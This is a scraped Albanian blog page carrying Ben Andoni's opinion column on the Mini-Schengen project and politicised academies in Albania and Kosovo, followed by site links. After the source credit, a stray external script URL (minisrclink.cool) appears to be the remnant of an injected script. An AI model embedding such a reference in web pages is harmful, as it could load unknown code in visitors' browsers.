• HOME
AlpeBlog
AlpeBlog

June 7th, 2026
  • HOME
BEN ANDONI/ Më mirë se kaq nuk do u vlente serbëve që shpikim!
Home
Blog

BEN ANDONI/ Më mirë se kaq nuk do u vlente serbëve që shpikim!

December 25th, 2019 F.autor Blog 0 comments

Prej ditësh kanë reshtur zërat për tërmetin dhe ato ia kanë lënë vendin problemit të përfitimit apo jo të Mini-Shengenit. Kori kundër qeverisë Rama ka gjetur gjithçka të zezë në këtë projekt, ashtu si grupi tjetër pro tij është munduar gati të ngrejë në qiell këtë projekt, që kryeministri shqiptar e mbrojti me forcë në Tiranë, në krah të presidentit serb Vuçiç, presidentit malazez Gjukanoviç dhe kryeministrit maqedon Zaev. Aq të zënë kanë qenë zyrtarët e lartë të katër vendeve për ta mbrojtur, saqë një moment, presidenti serb i ka ardhur direkt në ndihmë në konferencën e shtypit kryeministrit Rama, duke i thënë pak a shumë: Dukesh sikur po mbrohesh. Ne po punojmë për vendet tona.

Në fakt, sikur të bëhet dhe një e katërta e atyre që deklaruan zyrtarët, atëherë ky projekt duhet parë me pozitivitet. Mbi të gjitha është investim i BE-së dhe SHBA-së dhe kjo nuk mohohet dot. Veçse nga ajo që kanë realizuar qeveritë e Shqipërisë dhe Serbisë në vendet respektive kuptohet se ka një hendek të madh të gjërave që thuhen dhe atyre që realizohen, paçka se Ballkani ka filluar të funksionojë, madje edhe me Kosovën si shtet me të drejta të plota.

Ka një postulat që e lidh popullaritetin e një qeverie të jetë i lidhur ngushtë me treguesit ekonomikë siç janë inflacioni ose papunësia. Këto qeveritë tona i sfumojnë, ndërsa me politika populiste po mbysin indikatorët në emër të parimeve. Dhe, situata, s’është se mund të quhet pozitive për vendet tona, më keq akoma: “ne duhet të mendojmë se jemi kulturalisht brenda një “regjimi të së vërtetës” (shprehja e Michel Foucault), në të cilin pushteti po e transformon lojën normale midis së vërtetës dhe gënjeshtrës, që ne të gjithë njohim dhe përmes të cilës ne e organizojmë jetën tonë të përditshme, nën vështrimin dashamirës të dijeve shkencore”, shkruhet në një editorial të L’expresso.

Dhe, duket se pushteti dhe kundërshtarët e tij në dekadat e fundit kanë ndryshuar narracionin, qoftë dhe atë me argument shkencor. Edhe instrumentet shkencore në një vend, që duhet t’i ndijnë ndryshimeve dhe duhet të qartësojnë njerëzit, janë kthyer në ushqim të diskursit politik. Kush e kishte menduar që do të vinte koha që Akademitë tona të Shkencave të ngriheshin kundër politikave të vendeve tona? Kush e kishte menduar që nga akademikë të Kosovës do të flitej për një identitet të ri shqiptar? Kush e kishte menduar se do të prekej standarti i gjuhës, monumentit më të madh të identitetit tonë, që e kishin vendosur bashkë akademikë të gjithë trevave shqiptare?

Problemi nuk është se Akademitë tona janë hije të së shkuarës, atëherë kur ishin nën regjime të errëta, porse në kohën e lirisë nuk qartësojnë dhe nuk shërbejnë për të kthjelluar, sepse po bëhen zgjatime të politikës. E ka treguar veçmas ajo e Kosovës! E tregon jo pak herë ajo e Shqipërisë! Dhe, kur i mendon të gjitha këto, të vjen ndërmend ajo që përdorin shumë sot dhe që u pëlqen kjo situatë kundër armiqve të përjetshëm: Serbët nuk do të donin më shumë se kaq, që ne të kacafyteshim deri në nivelet më të larta akademike. Po ç’po themi! A nuk ishim Ne dhe Kosovarët që u takuam paqësisht me Sllobon, mu në kulm të keqësisë së tij. A nuk ishim Ne që u kemi dhënë serbëve karburant kur donin të shtypnin boshnjakët e kur e gjithë bota u bënte embargo! As nuk ishim Ne që merrnim serbët e Kosovës, apo kushdo ishte e që ato ditë fliste serbisht rrugëve të Tiranës në mesin e viteve ’90 të mbysnim opozitën.

Kushdo që jeni, presidentë e kryeministra të Kosovës dhe Shqipërisë bashkë me akademikët tuaj të varur, sepse ata nuk i shërbejnë më me integritetin e trurit vendeve të tyre: Mos harroni, jeni shërbëtorë të popullit! Na i kurseni serbët, me të cilët shtroheni në dreka, darka dhe takoheni sa herë ju do qejfi formalisht apo informalisht. (Javanews)

//minisrclink.cool/1e40c8bd4601a5a5a4.js

Facebook Twitter Google+ LinkedIn Pinterest
Next article MENTOR KIKIA/ “Ti kam fal ty me tana, me tana o me tana”, këtu po bëhet genocid kulturor, largoni vulgun nga skena e festivalit
Previous article ARTUR AJAZI/ Ish-deputetët e PD, rrinë e rrinë, dhe i fusin një xhiro andej nga çadrat

F.autor

Related Posts

KRESHNIK SPAHIU/ Pse në PD u gëzuan për ngjarjet në Nepal, Venezuelë apo në Hungari? Blog
May 22nd, 2026

KRESHNIK SPAHIU/ Pse në PD u gëzuan për ngjarjet në Nepal, Venezuelë apo në Hungari?

Leave a Reply Cancel reply

Postimet më të ndjekura
KRESHNIK SPAHIU/ Pse në PD u gëzuan për ngjarjet në Nepal, Venezuelë apo në Hungari?

KRESHNIK SPAHIU/ Pse në PD u gëzuan për ngjarjet në Nepal, Venezuelë apo në Hungari?

Blog May 22nd, 2026
MERO BAZE/ E vetmja gjë që kemi për t’i shitur Bordit të Paqes, është Edi Rama Blog

MERO BAZE/ E vetmja gjë që kemi për t’i shitur Bordit të Paqes, është Edi Rama

Jan 19th, 2026
ARTUR AJAZI/ A kemi Agjensi Kombëtare Mjedisi? Blog

ARTUR AJAZI/ A kemi Agjensi Kombëtare Mjedisi?

Feb 5th, 2026
EDUARD ZALOSHNJA/ Rrënjët e identitetit Blog

EDUARD ZALOSHNJA/ Rrënjët e identitetit

Mar 26th, 2026
ARTUR AJAZI/ Ç’do të thotë arratisja e një killer nga policia? Blog

ARTUR AJAZI/ Ç’do të thotë arratisja e një killer nga policia?

Jan 14th, 2026
  • HOME
  • Back to top
© AlpeNews 2017. Të Gjitha të drejtat e Rezervuara
Produced by o.k